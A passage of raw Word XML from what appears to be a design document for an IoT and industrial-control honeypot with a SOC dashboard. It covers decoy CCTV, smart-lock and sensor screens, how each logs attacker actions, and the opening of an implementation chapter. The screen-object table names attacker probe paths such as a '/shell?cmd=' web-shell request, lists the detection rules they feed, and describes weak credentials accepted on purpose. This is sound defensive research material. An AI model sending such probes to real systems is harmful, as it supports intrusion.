                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3017520" cy="1659636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Camera Setup Page with Firmware Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The firmware-upgrade form accepts files; uploads are hashed (SHA-256) and stored as evidence but never executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4206240" cy="2753175"/>
            <wp:docPr id="26" name="Picture 26"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="sensor_hmi_c.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4206240" cy="2753175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">23</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Industrial Sensor HMI (HTTP :8082, Basic authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Live readings and alarm come from the Device State Manager. Changing a threshold here changes it for Telnet and MQTT as well; the Temp threshold of 20 shown was set over Telnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9015" w:name="_Toc69015"/>
      <w:r>
        <w:t xml:space="preserve">6.2 Screen Objects and Actions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9015"/>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Screen Objects and Actions (attacker-facing and analyst-facing)</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00"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="4080"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="7950771F" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="53A631AA" w14:textId="77777777" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29CC179B" w14:textId="77777777" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15B26EC7" w14:textId="77777777" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Action / Logged Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CCTV Login (:8080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">User Name / Password fields, Login button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /login; logs IP, user name, password, user agent and result as an auth event; weak pair → /live, otherwise error after a delay.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CCTV Live View</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Channel tiles, Device panel, Stream link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Shows state values (recording, motion, resolution); stream link leads attackers to the RTSP honeypot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CCTV Live View</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Snapshot, Setup, Logout links</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">snapshot.cgi and device-info paths require the session cookie; every request is logged as http_request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CCTV Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Firmware file chooser, Upgrade button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /upgrade stores the file with its SHA-256 (file_upload event), never executes it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Any HTTP port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Any other path (/phpmyadmin, /HNAP1, /shell?cmd=…)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Returns a realistic 404; path, query and status are logged and feed the WEB_SCAN and PROTOCOL_EXPLOIT rules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Smart Lock REST (:8081)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/v1/auth, GET /api/v1/status, POST /api/v1/lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak credentials return a bearer token; lock/unlock changes the shared state (state_change event).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensor HMI (:8082)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Readings table, threshold fields, Apply button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic authentication; Apply changes sensor thresholds in Redis (ICS_UNAUTHORIZED_COMMAND).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard (all pages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sidebar search, live indicator, Detect now</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Full-text search over commands, payloads, IPs and credentials; WebSocket status and events per minute; Detect now calls POST /api/detect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">KPI cards, attack timeline, sessions by protocol, world map, top threats, live feed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Counts and charts for 24 h, 3 d or 7 d; offline map with heat layer (demo locations tagged DEMO); feed updated live.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attackers / attacker detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Ranking, campaigns; per-IP detections, sessions, credentials, IOCs, samples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Correlated profile with GeoIP and threat score 0–100; every session links to its replay.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity and type filters, MITRE ATT&amp;CK ranking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Live list of detections with technique IDs; HIGH and CRITICAL detections also raise a notification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Devices / Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Device state, sensor history and thresholds, lock log, probed stream paths; session list and replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Shared device state and attacker-made changes; replay shows attacker input and honeypot output in order with MITRE tags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="450174CD" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Malware / IOCs / Reports &amp; Alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Quarantine table, YARA families, CPU architectures; indicators; downloads; alert log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sample metadata only (files are never served); STIX 2.1, PDF, CSV and ML-dataset downloads; every alert decision.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9016" w:name="_Toc69016"/>
      <w:r>
        <w:t xml:space="preserve">7. Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9016"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter describes the implementation of the 70% build (v0.7). Source code is not reproduced; the core functions are given as pseudocode derived from the Python source. The code base is about 4,900 lines of Python (excluding tests) organised into one package per service plus a shared common package, and about 5,000 lines of TypeScript for the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Coding standards (Appendix D of the SDS template).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python names follow snake_case for functions and variables and PascalCase for classes (Session, DeviceState, FakeShell). Each module has a single responsibility and code shared by several services exists only once in common/ (DRY). All SQL uses parameterised queries; every service uses the logging module with one consistent format; every protocol handler catches its own exceptions so one malformed packet never stops the service; and secrets are read from environment variables, never written in code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9017" w:name="_Toc69017"/>
      <w:r>
        <w:t xml:space="preserve">7.1 Algorithms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9017"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
